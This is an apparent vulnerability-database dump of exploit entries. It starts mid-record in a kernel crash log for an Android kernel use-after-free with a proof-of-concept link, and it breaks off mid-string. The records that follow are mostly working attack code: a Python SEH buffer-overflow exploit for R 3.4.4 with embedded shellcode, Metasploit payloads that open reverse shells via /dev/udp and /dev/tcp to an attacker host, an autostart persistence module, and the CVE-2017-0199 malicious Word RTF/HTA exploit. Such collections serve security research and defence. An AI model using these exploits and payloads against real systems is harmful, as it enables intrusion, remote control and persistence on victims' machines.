8a000280 97ffff2c 17ffffe6 a9bf7bfd d2800002 910003fd 97ffffb4\r\n<4>[ 447.921170] c3 2621 d9dc a8c17bfd d65f03c0 a9ac7bfd 910003fd a90153f3 a9025bf5 a90363f7 a9046bf9\r\n<4>[ 447.929328] c3 2621 d9fc a90573fb d10443ff aa0003f3 9400afe5 aa1303e0 f8410402 f90033a2 9400af97\r\n<4>[ 447.937494] c3 2621 \r\n<4>[ 447.937494] c3 2621 SP: 0xffffffd8929b2f20:\r\n<4>[ 447.937693] c3 2621 2f20 8a04d9dc ffffffa6 929b2f60 ffffffd8 89e836e8 ffffffa6 204003c5 00000000\r\n<4>[ 447.952331] c3 2621 2f40 00000000 00000000 00000000 00000000 ffffffff ffffffff 00000000 00000000\r\n<4>[ 447.960491] c3 2621 2f60 214dbe00 ffffffbe 8ba1aa00 ffffffa6 00000000 00000000 8a04d8dc ffffffa6\r\n<4>[ 447.968651] c3 2621 2f80 c429b7c0 ffffff87 00000000 00000000 00000040 00000000 8c69ec28 ffffffa6\r\n<4>[ 447.976809] c3 2621 \r\n<0>[ 447.976941] c3 2621 Process kworker/3:3 (pid: 2621, stack limit = 0x0000000000000000)\r\n<4>[ 447.979247] c3 2621 Call trace:\r\n<4>[ 447.987122] c3 2621 Exception 
stack(0xffffffd8929b2d60 to 0xffffffd8929b2e90)\r\n<4>[ 447.990662] c3 2621 2d60: ffffffbe214dbe00 0000008000000000 00000000836e2000 ffffffa689e836e8\r\n<4>[ 447.997788] c3 2621 2d80: 00000000204003c5 0000000000000025 ffffffd8536fc908 0000000000000000\r\n<4>[ 448.006468] c3 2621 2da0: 0000000000000000 0000000000000000 0000000000000000 0000000000000000\r\n<4>[ 448.015098] c3 2621 2dc0: 0000000000000000 0000000000000000 0000000000000000 0000000000000000\r\n<4>[ 448.023777] c3 2621 2de0: 0000000000000000 0000000000000000 0000000000000000 0000000000000000\r\n<4>[ 448.032461] c3 2621 2e00: 0000000000000000 0000000000000000 0000000000000000 0000000000000000\r\n<4>[ 448.041195] c3 2621 2e20: 0000000000000000 e95cc056ac940c73 ffffffbe214dbe00 ffffffa68ba1aa00\r\n<4>[ 448.049872] c3 2621 2e40: 0000000000000000 ffffffa68a04d8dc ffffff87c429b7c0 0000000000000000\r\n<4>[ 448.058561] c3 2621 2e60: 0000000000000040 ffffffa68c69ec28 ffffffa68a21a558 ffffff8b12978007\r\n<4>[ 448.067216] c3 2621 2e80: ffffff8b12978008 ffffffd8929fb810\r\n<4>[ 448.075867] c3 2621 [<ffffffa689e836e8>] el1_sync+0x28/0xe0\r\n<0>[ 448.081787] c3 2621 Code: a90637ec a9073fee a90847f0 a9094ff2 (a90a57f4) \r\n<4>[ 448.087496] c3 2621 ---[ end trace 8d4b2347f8b71fe7 ]---\r\n<4>[ 448.087540] c4 2684 ------------[ cut here ]------------\r\n<2>[ 448.087544] c4 2684 Kernel BUG at 0000000000000000 [verbose debug info unavailable]\r\n<0>[ 448.087547] c4 2684 Internal error: Oops - BUG: 96000005 [#2] PREEMPT SMP\r\n<4>[ 448.087553] c4 2684 Modules linked in:\r\n<4>[ 448.087561] c4 2684 CPU: 4 PID: 2684 Comm: poc Tainted: G D 4.4.116-gbcd0ecccd040-dirty #45\r\n<4>[ 448.087563] c4 2684 Hardware name: Qualcomm Technologies, Inc. 
MSM8998 v2.1 (DT)\r\n<4>[ 448.087565] c4 2684 task: 0000000000000000 task.stack: 0000000000000000\r\n<4>[ 448.087578] c4 2684 PC is at qlist_free_all+0x3c/0x80\r\n<4>[ 448.087581] c4 2684 LR is at qlist_free_all+0x7c/0x80\r\n<4>[ 448.087585] c4 2684 pc : [<ffffffa68a07bbbc>] lr : [<ffffffa68a07bbfc>] pstate: 60400145\r\n<4>[ 448.087586] c4 2684 sp : ffffffd87e3b3880\r\n<4>[ 448.087591] c4 2684 x29: ffffffd87e3b3880 x28: ffffffa68ca1a000 \r\n<4>[ 448.087595] c4 2684 x27: 000000000591e848 x26: ffffffd87e3b3920 \r\n<4>[ 448.087598] c4 2684 x25: 0000000000000140 x24: 0000000000000000 \r\n<4>[ 448.087601] c4 2684 x23: ffffffd87e3b3920 x22: ffffffa68a07bbbc \r\n<4>[ 448.087604] c4 2684 x21: 0000000000000000 x20: ffffffd8929f8040 \r\n<4>[ 448.087607] c4 2684 x19: ffffffd8929f8040 x18: 00000000c8056d20 \r\n<4>[ 448.087611] c4 2684 x17: 000000002c754130 x16: 0000000085837409 \r\n<4>[ 448.087613] c4 2684 x15: 00000000a50d5ad3 x14: 0000000000000000 \r\n<4>[ 448.087617] c4 2684 x13: 0000000001075000 x12: ffffffffffffffff \r\n<4>[ 448.087620] c4 2684 x11: 0000000000000040 x10: ffffff8b0fc76746 \r\n<4>[ 448.087623] c4 2684 x9 : ffffff8b0fc76745 x8 : ffffffd87e3b3a2b \r\n<4>[ 448.087626] c4 2684 x7 : 0000000000000000 x6 : ffffffd87e3b3a08 \r\n<4>[ 448.087629] c4 2684 x5 : fffffffffe8c0000 x4 : 0000000000000000 \r\n<4>[ 448.087632] c4 2684 x3 : ffffffd8929f7ff0 x2 : 0000000000000000 \r\n<4>[ 448.087635] c4 2684 x1 : dead0000000000ff x0 : 0000000000000000 \r\n<4>[ 448.087637] c4 2684 \r\n<4>[ 448.087637] c4 2684 PC: 0xffffffa68a07bb7c:\r\n<4>[ 448.087646] c4 2684 bb7c 17fffff1 a9bc7bfd 910003fd a90153f3 a9025bf5 f9001bf7 f9400013 b4000253\r\n<4>[ 448.087655] c4 2684 bb9c 90000016 aa0103f5 aa0003f7 912ef2d6 14000002 aa1403f3 aa1503e0 b40001f5\r\n<4>[ 448.087664] c4 2684 bbbc b980c401 aa1603e2 f9400274 cb010261 97fff36f b5ffff14 f90006ff f90002ff\r\n<4>[ 448.087673] c4 2684 bbdc f9000aff a94153f3 a9425bf5 f9401bf7 a8c47bfd d65f03c0 aa1303e0 
97ffff93\r\n<4>[ 448.087675] c4 2684 \r\n<4>[ 448.087675] c4 2684 LR: 0xffffffa68a07bbbc:\r\n<4>[ 448.087684] c4 2684 bbbc b980c401 aa1603e2 f9400274 cb010261 97fff36f b5ffff14 f90006ff f90002ff\r\n<4>[ 448.087692] c4 2684 bbdc f9000aff a94153f3 a9425bf5 f9401bf7 a8c47bfd d65f03c0 aa1303e0 97ffff93\r\n<4>[ 448.087701] c4 2684 bbfc 17fffff0 a9bc7bfd aa0003e2 910003fd a90153f3 f0012ed3 aa0003f4 b000eb40\r\n<4>[ 448.087711] c4 2684 bc1c 910083a1 d538d083 913c8000 f90013bf 8b000060 f9452a63 f9001fa3 f90017bf\r\n<4>[ 448.087712] c4 2684 \r\n<4>[ 448.087712] c4 2684 SP: 0xffffffd87e3b3840:\r\n<4>[ 448.087722] c4 2684 3840 8a07bbfc ffffffa6 7e3b3880 ffffffd8 8a07bbbc ffffffa6 60400145 00000000\r\n<4>[ 448.087731] c4 2684 3860 7e3b3920 ffffffd8 00000000 00000000 00000000 00000080 8b4ddfd0 ffffffa6\r\n<4>[ 448.087740] c4 2684 3880 7e3b38c0 ffffffd8 8a07bf9c ffffffa6 8c656000 ffffffa6 8ca1f500 ffffffa6\r\n<4>[ 448.087749] c4 2684 38a0 8ca1a000 ffffffa6 000000f7 00000000 8c68d000 ffffffa6 fabb3a00 ffffffd7\r\n<4>[ 448.087750] c4 2684 \r\n<0>[ 448.087753] c4 2684 Process poc (pid: 2684, stack limit = 0x0000000000000000)\r\n<4>[ 448.087754] c4 2684 Call trace:\r\n<4>[ 448.087758] c4 2684 Exception stack(0xffffffd87e3b3680 to 0xffffffd87e3b37b0)\r\n<4>[ 448.087763] c4 2684 3680: ffffffd8929f8040 0000008000000000 00000000836e2000 ffffffa68a07bbbc\r\n<4>[ 448.087768] c4 2684 36a0: 0000000060400145 0000000000000025 0000000000000140 ffffffd7fabb3a00\r\n<4>[ 448.087773] c4 2684 36c0: 0000000000000000 ffffffd87e3b37d0 ffffffd87e3b3720 ffffffa68a0768e0\r\n<4>[ 448.087779] c4 2684 36e0: ffffffbe224a7d80 0000000000000000 ffffffd7fabb3a00 ffffffd7fabb3a00\r\n<4>[ 448.087784] c4 2684 3700: 0000000100150015 ffffffd8929f7e00 0000000180150014 ffffffd899803b00\r\n<4>[ 448.087789] c4 2684 3720: ffffffd87e3b3830 ffffffa68a078b38 ffffffbe224a7d80 ffffffd8929f7ff0\r\n<4>[ 448.087794] c4 2684 3740: ffffffd7fabb3a00 e95cc056ac940c73 0000000000000000 dead0000000000ff\r\n<4>[ 448.087799] c4 2684 3760: 
0000000000000000 ffffffd8929f7ff0 0000000000000000 fffffffffe8c0000\r\n<4>[ 448.087804] c4 2684 3780: ffffffd87e3b3a08 0000000000000000 ffffffd87e3b3a2b ffffff8b0fc76745\r\n<4>[ 448.087808] c4 2684 37a0: ffffff8b0fc76746 0000000000000040\r\n<4>[ 448.087813] c4 2684 [<ffffffa68a07bbbc>] qlist_free_all+0x3c/0x80\r\n<4>[ 448.087819] c4 2684 [<ffffffa68a07bf9c>] quarantine_reduce+0x17c/0x1a0\r\n<4>[ 448.087824] c4 2684 [<ffffffa68a07a1b4>] kasan_kmalloc+0xe0/0xe4\r\n<4>[ 448.087828] c4 2684 [<ffffffa68a07a964>] kasan_slab_alloc+0x14/0x1c\r\n<4>[ 448.087832] c4 2684 [<ffffffa68a078030>] kmem_cache_alloc+0x144/0x27c\r\n<4>[ 448.087840] c4 2684 [<ffffffa68a15d0dc>] ext4_inode_attach_jinode+0x9c/0x118\r\n<4>[ 448.087844] c4 2684 [<ffffffa68a150d74>] ext4_file_open+0xc8/0x21c\r\n<4>[ 448.087848] c4 2684 [<ffffffa68a087488>] do_dentry_open+0x350/0x4ec\r\n<4>[ 448.087851] c4 2684 [<ffffffa68a087930>] finish_open+0x74/0xa8\r\n<4>[ 448.087857] c4 2684 [<ffffffa68a09fa34>] path_openat+0x980/0x1404\r\n<4>[ 448.087861] c4 2684 [<ffffffa68a0a1a50>] do_filp_open+0x98/0x188\r\n<4>[ 448.087866] c4 2684 [<ffffffa68a089004>] do_sys_open+0x170/0x2d4\r\n<4>[ 448.087869] c4 2684 [<ffffffa68a0891a0>] SyS_openat+0x10/0x18\r\n<4>[ 448.087875] c4 2684 [<ffffffa689e842b0>] el0_svc_naked+0x24/0x28\r\n<0>[ 448.087881] c4 2684 Code: 14000002 aa1403f3 aa1503e0 b40001f5 (b980c401) \r\n<4>[ 448.087944] c4 2684 ---[ end trace 8d4DBGC\r\n==================================\r\n\r\nThe KASAN report points to instruction 267c in the following assembly:\r\n\r\n==================================\r\n0000000000002630 <set_page_dirty>:\r\n{\r\n 2630: a9bd7bfd stp x29, x30, [sp, #-48]!\r\n 2634: 910003fd mov x29, sp\r\n 2638: a90153f3 stp x19, x20, [sp, #16]\r\n 263c: f90013f5 str x21, [sp, #32]\r\n 2640: aa0003f3 mov x19, x0\r\n struct address_space *mapping = page_mapping(page);\r\n 2644: 94000000 bl 0 <page_mapping>\r\n 2648: aa0003f4 mov x20, x0\r\n 264c: d5384115 mrs x21, sp_el0\r\n if 
(current->jh_task_flags && mapping)\r\n 2650: 9128a2a0 add x0, x21, #0xa28\r\n 2654: 94000000 bl 0 <__asan_load4>\r\n 2658: b94a2aa0 ldr w0, [x21, #2600]\r\n 265c: 340000a0 cbz w0, 2670 <set_page_dirty+0x40>\r\n 2660: b40003b4 cbz x20, 26d4 <set_page_dirty+0xa4>\r\n msleep(500);\r\n 2664: 52803e80 mov w0, #0x1f4 // #500\r\n 2668: 94000000 bl 0 <msleep>\r\n 266c: 14000002 b 2674 <set_page_dirty+0x44>\r\n if (likely(mapping)) {\r\n 2670: b4000334 cbz x20, 26d4 <set_page_dirty+0xa4>\r\n int (*spd)(struct page *) = mapping->a_ops->set_page_dirty;\r\n 2674: 9101a280 add x0, x20, #0x68\r\n 2678: 94000000 bl 0 <__asan_load8>\r\n 267c: f9403694 ldr x20, [x20, #104]\r\n 2680: 91006280 add x0, x20, #0x18\r\n 2684: 94000000 bl 0 <__asan_load8>\r\n 2688: f9400e94 ldr x20, [x20, #24]\r\n 268c: aa1303e0 mov x0, x19\r\n 2690: 94000000 bl 0 <__asan_load8>\r\n 2694: f9400260 ldr x0, [x19]\r\n==================================\r\n\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46941.zip\n\n# 0day.today [2019-05-30] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32820"}, {"lastseen": "2018-08-29T20:36:15", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category local exploits", "modified": "2018-08-29T00:00:00", "published": "2018-08-29T00:00:00", "id": "1337DAY-ID-30990", "href": "https://0day.today/exploit/description/30990", "title": "R 3.4.4 - Buffer Overflow (SEH) Exploit", "type": "zdt", "sourceData": "#--------------------------------------------------------#\r\n#Exploit Title: R v3.4.4 - (SEH) Buffer Overflow Exploit\r\n#Exploit Author : ZwX\r\n#Exploit Date: 2018-08-22\r\n#Vendor Homepage : https://www.r-project.org/\r\n#Tested on OS: Windows 7\r\n#Social: twitter.com/ZwX2a\r\n#contact: [email\u00a0protected]\r\n#Website: http://zwx-pentester.fr/\r\n#--------------------------------------------------------#\r\n \r\n \r\n#Technical Details & 
Description:\r\n#================================\r\n'''A local buffer overflow vulnerability has been discovered in the official R v3.4.4 software.\r\nThe vulnerability allows local attackers to overwrite the registers (example eip) to compromise the local software process.\r\nThe issue can be exploited by local attackers with system privileges to compromise the affected local computer system.\r\nThe vulnerability is marked as classic buffer overflow issue'''\r\n \r\n \r\n# Manual steps to reproduce the vulnerability: under GUI preferences\r\n# paste bo.txt contents into 'Language for menus and messages' click ok --> Now the calculator executes!\r\n \r\n \r\n#!/usr/bin/python\r\n \r\nfrom struct import pack\r\nbuffer = \"x41\" * 900\r\na = \"\\xeb\\x14\\x90\\x90\"\r\nb = pack(\"<I\",0x6cb85492) #pop esi # pop ebp # ret 04 | {PAGE_EXECUTE_READ} [R.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.4.4 (C:Program FilesRR-3.4.4bini386R.dll)\r\ncalc=(\"\\xdb\\xd7\\xd9\\x74\\x24\\xf4\\xb8\\x79\\xc4\\x64\\xb7\\x33\\xc9\\xb1\\x38\"\r\n\"\\x5d\\x83\\xc5\\x04\\x31\\x45\\x13\\x03\\x3c\\xd7\\x86\\x42\\x42\\x3f\\xcf\"\r\n\"\\xad\\xba\\xc0\\xb0\\x24\\x5f\\xf1\\xe2\\x53\\x14\\xa0\\x32\\x17\\x78\\x49\"\r\n\"\\xb8\\x75\\x68\\xda\\xcc\\x51\\x9f\\x6b\\x7a\\x84\\xae\\x6c\\x4a\\x08\\x7c\"\r\n\"\\xae\\xcc\\xf4\\x7e\\xe3\\x2e\\xc4\\xb1\\xf6\\x2f\\x01\\xaf\\xf9\\x62\\xda\"\r\n\"\\xa4\\xa8\\x92\\x6f\\xf8\\x70\\x92\\xbf\\x77\\xc8\\xec\\xba\\x47\\xbd\\x46\"\r\n\"\\xc4\\x97\\x6e\\xdc\\x8e\\x0f\\x04\\xba\\x2e\\x2e\\xc9\\xd8\\x13\\x79\\x66\"\r\n\"\\x2a\\xe7\\x78\\xae\\x62\\x08\\x4b\\x8e\\x29\\x37\\x64\\x03\\x33\\x7f\\x42\"\r\n\"\\xfc\\x46\\x8b\\xb1\\x81\\x50\\x48\\xc8\\x5d\\xd4\\x4d\\x6a\\x15\\x4e\\xb6\"\r\n\"\\x8b\\xfa\\x09\\x3d\\x87\\xb7\\x5e\\x19\\x8b\\x46\\xb2\\x11\\xb7\\xc3\\x35\"\r\n\"\\xf6\\x3e\\x97\\x11\\xd2\\x1b\\x43\\x3b\\x43\\xc1\\x22\\x44\\x93\\xad\\x9b\"\r\n\"\\xe0\\xdf\\x5f\\xcf\\x93\\xbd\\x35\\x0e\\x11\\xb8\\x70\\x10\\x29\\xc3\\xd2\"\r\n\"\\x79\\x18\\x48\\xbd\\xfe\\x
a5\\x9b\\xfa\\xf1\\xef\\x86\\xaa\\x99\\xa9\\x52\"\r\n\"\\xef\\xc7\\x49\\x89\\x33\\xfe\\xc9\\x38\\xcb\\x05\\xd1\\x48\\xce\\x42\\x55\"\r\n\"\\xa0\\xa2\\xdb\\x30\\xc6\\x11\\xdb\\x10\\xa5\\xaf\\x7f\\xcc\\x43\\xa1\\x1b\"\r\n\"\\x9d\\xe4\\x4e\\xb8\\x32\\x72\\xc3\\x34\\xd0\\xe9\\x10\\x87\\x46\\x91\\x37\"\r\n\"\\x8b\\x15\\x7b\\xd2\\x2b\\xbf\\x83\")\r\nnops = \"\\x90\" * 20\r\n \r\npoc = buffer + a + b + nops + calc\r\nfile = open(\"bo.txt\",\"w\")\r\nfile.write(poc)\r\nfile.close()\r\n \r\nprint \"POC Created by ZwX\"\r\n \r\n \r\n#Solution - Fix & Patch:\r\n#=======================\r\n'''The solution could be to restrict and filter the number of characters on input of 'Language for menus and messages' '''\r\n \r\n \r\n# Disclaimer:\r\n#===============\r\n \r\n'''Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due\r\ncredit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the\r\nauthor. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related\r\ninformation or exploits by the author or elsewhere.\r\n \r\n \r\n \r\n Copyright A(c) 2018 | ZwX - Security Researcher (Software & web application)'''\n\n# 0day.today [2018-08-29] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30990"}], "metasploit": [{"lastseen": "2019-12-12T17:37:32", "bulletinFamily": "exploit", "description": "Creates an interactive shell via bash's builtin /dev/udp. 
This will not work on circa 2009 and older Debian-based Linux distributions (including Ubuntu) because they compile bash without the /dev/udp feature.\n", "modified": "2019-05-24T06:33:44", "published": "2019-05-20T07:57:01", "id": "MSF:PAYLOAD/CMD/UNIX/REVERSE_BASH_UDP", "href": "", "type": "metasploit", "title": "Unix Command Shell, Reverse UDP (/dev/udp)", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_udp'\nrequire 'msf/base/sessions/command_shell'\nrequire 'msf/base/sessions/command_shell_options'\n\nmodule MetasploitModule\n\n CachedSize = :dynamic\n\n include Msf::Payload::Single\n include Msf::Sessions::CommandShellOptions\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Unix Command Shell, Reverse UDP (/dev/udp)',\n 'Description' => %q{\n Creates an interactive shell via bash's builtin /dev/udp.\n\n This will not work on circa 2009 and older Debian-based Linux\n distributions (including Ubuntu) because they compile bash\n without the /dev/udp feature.\n },\n 'Author' => [\n 'hdm', # Reverse bash TCP\n 'bcoles' # Reverse bash UDP\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Handler' => Msf::Handler::ReverseUdp,\n 'Session' => Msf::Sessions::CommandShell,\n 'PayloadType' => 'cmd_bash',\n 'RequiredCmd' => 'bash-udp',\n 'Payload' =>\n {\n 'Offsets' => { },\n 'Payload' => ''\n }\n ))\n end\n\n #\n # Constructs the payload\n #\n def generate\n return super + command_string\n end\n\n #\n # Returns the command string to use for execution\n #\n def command_string\n fd = rand(200) + 20\n return \"0<&#{fd}-;exec #{fd}<>/dev/udp/#{datastore['LHOST']}/#{datastore['LPORT']};echo>&#{fd};sh <&#{fd} >&#{fd} 2>&#{fd}\";\n\n # no semicolons\n #return \"sh -i >& /dev/udp/#{datastore['LHOST']}/#{datastore['LPORT']} 0>&1\"\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, 
"sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/singles/cmd/unix/reverse_bash_udp.rb"}, {"lastseen": "2019-11-30T03:57:00", "bulletinFamily": "exploit", "description": "This module will create an autostart entry to execute a payload. The payload will be executed when the users logs in.\n", "modified": "2018-08-20T09:51:41", "published": "2018-07-15T10:01:30", "id": "MSF:EXPLOIT/LINUX/LOCAL/AUTOSTART_PERSISTENCE", "href": "", "type": "metasploit", "title": "Autostart Desktop Item Persistence", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Unix\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Autostart Desktop Item Persistence',\n 'Description' => %q(\n This module will create an autostart entry to execute a payload.\n The payload will be executed when the users logs in.\n ),\n 'License' => MSF_LICENSE,\n 'Author' => [ 'Eliott Teissonniere' ],\n 'Platform' => [ 'unix', 'linux' ],\n 'Arch' => ARCH_CMD,\n 'Payload' => {\n 'BadChars' => '#%\\n\"',\n 'Compat' => {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'generic python netcat perl'\n }\n },\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\n 'DefaultOptions' => { 'WfsDelay' => 0, 'DisablePayloadHandler' => 'true' },\n 'DisclosureDate' => 'Feb 13 2006', # Date of the 0.5 doc for autostart\n 'Targets' => [ ['Automatic', {}] ],\n 'DefaultTarget' => 0\n ))\n\n register_options([ OptString.new('NAME', [false, 'Name of autostart entry' ]) ])\n end\n\n def exploit\n name = datastore['NAME'] || Rex::Text.rand_text_alpha(5)\n\n home = cmd_exec('echo ~')\n\n path = \"#{home}/.config/autostart/#{name}.desktop\"\n\n print_status('Making sure the autostart directory exists')\n cmd_exec(\"mkdir -p #{home}/.config/autostart\") # in case no 
autostart exists\n\n print_status(\"Uploading autostart file #{path}\")\n\n write_file(path, [\n \"[Desktop Entry]\",\n \"Type=Application\",\n \"Name=#{name}\",\n \"NoDisplay=true\",\n \"Terminal=false\",\n \"Exec=/bin/sh -c \\\"#{payload.encoded}\\\"\"\n ].join(\"\\n\"))\n end\nend\n\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/autostart_persistence.rb"}, {"lastseen": "2019-11-23T19:19:56", "bulletinFamily": "exploit", "description": "Connect back and create a command shell via Ksh. Note: Although Ksh is often available, please be aware it isn't usually installed by default.\n", "modified": "2018-05-16T00:56:55", "published": "2018-05-15T14:36:47", "id": "MSF:PAYLOAD/CMD/UNIX/REVERSE_KSH", "href": "", "type": "metasploit", "title": "Unix Command Shell, Reverse TCP (via Ksh)", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/base/sessions/command_shell'\nrequire 'msf/base/sessions/command_shell_options'\n\nmodule MetasploitModule\n\n CachedSize = 52\n\n include Msf::Payload::Single\n include Msf::Sessions::CommandShellOptions\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Unix Command Shell, Reverse TCP (via Ksh)',\n 'Description' => %q{\n Connect back and create a command shell via Ksh. 
Note: Although Ksh is often\n available, please be aware it isn't usually installed by default.\n },\n 'Author' => 'Wang Yihang <wangyihanger[at]gmail.com>',\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Session' => Msf::Sessions::CommandShell,\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'ksh',\n 'Payload' => { 'Offsets' => {}, 'Payload' => '' }\n ))\n end\n\n def generate\n super + command_string\n end\n\n def command_string\n \"ksh -c 'ksh >/dev/tcp/#{datastore['LHOST']}/#{datastore['LPORT']} 2>&1 <&1'\"\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/singles/cmd/unix/reverse_ksh.rb"}, {"lastseen": "2019-12-12T11:39:57", "bulletinFamily": "exploit", "description": "This module creates a malicious RTF file that when opened in vulnerable versions of Microsoft Word will lead to code execution. The flaw exists in how a olelink object can make a http(s) request, and execute hta code in response. This bug was originally seen being exploited in the wild starting in Oct 2016. 
This module was created by reversing a public malware sample.\n", "modified": "2017-08-20T22:48:03", "published": "2017-04-15T02:32:48", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/OFFICE_WORD_HTA", "href": "", "type": "metasploit", "title": "Microsoft Office Word Malicious Hta Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::FILEFORMAT\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => \"Microsoft Office Word Malicious Hta Execution\",\n 'Description' => %q{\n This module creates a malicious RTF file that when opened in\n vulnerable versions of Microsoft Word will lead to code execution.\n The flaw exists in how a olelink object can make a http(s) request,\n and execute hta code in response.\n\n This bug was originally seen being exploited in the wild starting\n in Oct 2016. 
This module was created by reversing a public\n malware sample.\n },\n 'Author' =>\n [\n 'Haifei Li', # vulnerability analysis\n 'ryHanson',\n 'wdormann',\n 'DidierStevens',\n 'vysec',\n 'Nixawk', # module developer\n 'sinn3r' # msf module improvement\n ],\n 'License' => MSF_LICENSE,\n 'References' => [\n ['CVE', '2017-0199'],\n ['URL', 'https://securingtomorrow.mcafee.com/mcafee-labs/critical-office-zero-day-attacks-detected-wild/'],\n ['URL', 'https://www.fireeye.com/blog/threat-research/2017/04/acknowledgement_ofa.html'],\n ['URL', 'https://www.helpnetsecurity.com/2017/04/10/ms-office-zero-day/'],\n ['URL', 'https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html'],\n ['URL', 'https://www.checkpoint.com/defense/advisories/public/2017/cpai-2017-0251.html'],\n ['URL', 'https://github.com/nccgroup/Cyber-Defence/blob/master/Technical%20Notes/Office%20zero-day%20(April%202017)/2017-04%20Office%20OLE2Link%20zero-day%20v0.4.pdf'],\n ['URL', 'https://blog.nviso.be/2017/04/12/analysis-of-a-cve-2017-0199-malicious-rtf-document/'],\n ['URL', 'https://www.hybrid-analysis.com/sample/ae48d23e39bf4619881b5c4dd2712b8fabd4f8bd6beb0ae167647995ba68100e?environmentId=100'],\n ['URL', 'https://www.mdsec.co.uk/2017/04/exploiting-cve-2017-0199-hta-handler-vulnerability/'],\n ['URL', 'https://www.microsoft.com/en-us/download/details.aspx?id=10725'],\n ['URL', 'https://msdn.microsoft.com/en-us/library/dd942294.aspx'],\n ['URL', 'https://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-CFB/[MS-CFB].pdf'],\n ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199']\n ],\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Microsoft Office Word', {} ]\n ],\n 'DefaultOptions' =>\n {\n 'DisablePayloadHandler' => false\n },\n 'DefaultTarget' => 0,\n 'Privileged' => false,\n 'DisclosureDate' => 'Apr 14 2017'))\n\n register_options([\n OptString.new('FILENAME', [ true, 'The file name.', 'msf.doc']),\n 
OptString.new('URIPATH', [ true, 'The URI to use for the HTA file', 'default.hta'])\n ])\n end\n\n def generate_uri\n uri_maxlength = 112\n\n host = datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket.source_address : datastore['SRVHOST']\n scheme = datastore['SSL'] ? 'https' : 'http'\n\n uri = \"#{scheme}://#{host}:#{datastore['SRVPORT']}#{'/' + Rex::FileUtils.normalize_unix_path(datastore['URIPATH'])}\"\n uri = Rex::Text.hexify(Rex::Text.to_unicode(uri))\n uri.delete!(\"\\n\")\n uri.delete!(\"\\\\x\")\n uri.delete!(\"\\\\\")\n\n padding_length = uri_maxlength * 2 - uri.length\n fail_with(Failure::BadConfig, \"please use a uri < #{uri_maxlength} bytes \") if padding_length < 0\n padding_length.times { uri << \"0\" }\n uri\n end\n\n def create_ole_ministream_data\n # require 'rex/ole'\n # ole = Rex::OLE::Storage.new('cve-2017-0199.bin', Rex::OLE::STGM_READ)\n # ministream = ole.instance_variable_get(:@ministream)\n # ministream_data = ministream.instance_variable_get(:@data)\n\n ministream_data = \"\"\n ministream_data << \"01000002090000000100000000000000\" # 00000000: ................\n ministream_data << \"0000000000000000a4000000e0c9ea79\" # 00000010: ...............y\n ministream_data << \"f9bace118c8200aa004ba90b8c000000\" # 00000020: .........K......\n ministream_data << generate_uri\n ministream_data << \"00000000795881f43b1d7f48af2c825d\" # 000000a0: ....yX..;..H.,.]\n ministream_data << \"c485276300000000a5ab0000ffffffff\" # 000000b0: ..'c............\n ministream_data << \"0609020000000000c000000000000046\" # 000000c0: ...............F\n ministream_data << \"00000000ffffffff0000000000000000\" # 000000d0: ................\n ministream_data << \"906660a637b5d2010000000000000000\" # 000000e0: .f`.7...........\n ministream_data << \"00000000000000000000000000000000\" # 000000f0: ................\n ministream_data << \"100203000d0000000000000000000000\" # 00000100: ................\n ministream_data << \"00000000000000000000000000000000\" # 00000110: 
